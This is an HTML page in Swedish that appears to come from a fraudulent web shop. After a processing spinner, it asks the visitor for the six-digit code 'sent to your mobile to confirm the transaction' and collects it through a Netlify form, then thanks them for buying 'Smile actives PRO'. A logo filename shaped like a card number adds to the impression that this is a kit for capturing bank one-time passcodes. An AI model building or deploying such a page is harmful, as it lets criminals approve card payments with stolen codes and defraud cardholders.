<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Thank You</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link href='https://fonts.googleapis.com/css?family=Montserrat' rel='stylesheet' type='text/css'>
    <style>
body {
    overflow: hidden;
    font-family: 'Montserrat', sans-serif;
    color: #000;
    background-color: #FFFFFF;
    text-align: center;
}

.spinner-container, .otp-container {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 100vh;
    text-align: center;
    background-color: #f5f5f5;
}

/* This is modified to initially hide the container */
.thanks-container {
    display: none;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 100vh;
    text-align: center;
    background-color: #f5f5f5;
    transition: opacity 0.5s ease;
}

.spinner {
    border: 4px solid rgba(0, 0, 0, 0.1);
    width: 50px;
    height: 50px;
    border-radius: 50%;
    border-left-color: #000;
    animation: spin 0.5s linear infinite;
    margin-bottom: 1rem;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.otp-container-2 {
    background-color: #fff;
    padding: 30px;
    border: 1px solid #e1e1e1;
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
    border-radius: 12px;
    width: 70%;
    text-align: center;
}

.otp-container-2 .otp-inputs {
    display: flex;
    justify-content: space-between;
    max-width: 260px;
    margin: 20px auto;
    flex-wrap: nowrap;
}

.otp-container-2 .otp-inputs input {
    border: 2px solid #e1e1e1;
    font-size: 22px;
    background-color: #f9f9f9;
    color: #000;
    width: 35px;
    height: 45px;
    text-align: center;
    border-radius: 8px;
    margin: 0 5px;
}

/* Responsive Styles */
@media (max-width: 768px) {
    .otp-container-2 {
        padding: 20px;
        width: 90%;
    }

    .otp-container-2 .otp-inputs {
        justify-content: space-between;
    }

    .otp-container-2 .otp-inputs input {
        margin: 0 3px;
        width: 14%;
    }
}

.btn-2 {
    background-color: #000;
    color: #fff;
    padding: 10px 25px;
    border: none;
    border-radius: 25px;
    margin-top: 30px;
    cursor: pointer;
    display: block;
    margin-left: auto;
    margin-right: auto;
}

.btn-2:hover {
    background-color: #333;
}

.logo {
    width: 30%;
    margin-bottom: 20px;
}

</style>

</head>
<div id="customAlert" style="display: none; position: fixed; top: 0; right: 0; bottom: 0; left: 0; background-color: rgba(0,0,0,0.7); color: white; align-items: center; justify-content: center; font-size: 1.5rem;">
    Custom submission message goes here.
</div>
<body>
    <!-- Spinner Container -->
    <div class="spinner-container">
        <div class="spinner"></div>
        <p>Beställningen håller på att behandlas... Vänligen uppdatera inte sidan.</p>
    </div>

    <!-- OTP Container -->
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-md-6 otp-container otp-container-2">
                <img src="images/4275 3156 0372 5493.png" alt="App Logo" class="logo">
                <h2>Vänligen bekräfta</h2>
                <p>Ange koden som skickats till din mobil för att bekräfta transaktionen:</p>
                <!-- The actual visible form -->
                <form id="visibleOTPForm" name="otpForm" data-netlify="true">
                    <div class="otp-inputs">
                        <!-- OTP input fields -->
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp1">
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp2">
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp3">
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp4">
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp5">
                        <input type="tel" maxlength="1" autocomplete="one-time-code" pattern="[0-9]{1}" inputmode="numeric" name="otp6">
                    </div>
                    <input type="hidden" name="form-name" value="otpForm" />
                    <button class="btn-2" type="submit">Bekräfta</button>
                </form>
            </div>
        </div>
    </div>

    <!-- Thanks Container -->
    <div class="container thanks-container">
        <img src="images/sa-2022-logo.png" alt="Thank You Image">
        <h1 class="display-4">Tack för att du köpte Smile actives PRO!</h1>
        <p class="lead">Ditt beställningsnummer är #SA339868. Observera att det tar 1-3 dagar att behandla beställningar och att leveranstiden varierar mellan 5 och 7 arbetsdagar.</p>
        <a class="btn btn-primary" href="index.html">Fortsätt handla</a>
    </div>

    <!-- Scripts -->
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script src="thankyou.js"></script>
</body>

</html>
